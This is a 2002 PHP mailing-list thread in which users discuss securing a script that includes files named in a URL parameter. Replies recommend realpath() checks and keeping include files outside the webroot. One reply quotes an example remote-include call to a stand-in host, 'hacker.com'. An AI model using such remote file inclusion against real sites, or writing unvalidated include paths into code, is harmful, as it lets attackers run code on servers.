The easiest and safest way to get around this problem is to place all your
include files outside of your webroot directory (say one level up), so they
will be accessible locally via includes, but NOT accessible via http.
HTH, Stas
----- Original Message -----
From: "John Wards" <[EMAIL PROTECTED]>
To: "PHP" <[EMAIL PROTECTED]>
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh
erm......would that alow hackers access? Say I have a database include file
would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)
I hope bloody not!!! if so how on earth do i get round that!
John
On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> Use realpath() to check the path. I also suspect your script is
> vulnarable to cross-site includes
> (include('http://hacker.com/script.inc');)
>
> Rick Beckman wrote:
> >Okay, I was mistaken... There is a gaping security hole in my simple li'l
> >script... How do I modify it to only accept files from a certain path? I
> >want the url format to be script.php?call=1 where "1" is the called file
> > in the /includes/ directory. Just when I get optimistic I leave the
> > entire system exposed. Yeah, that fits with my luck. :-)
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
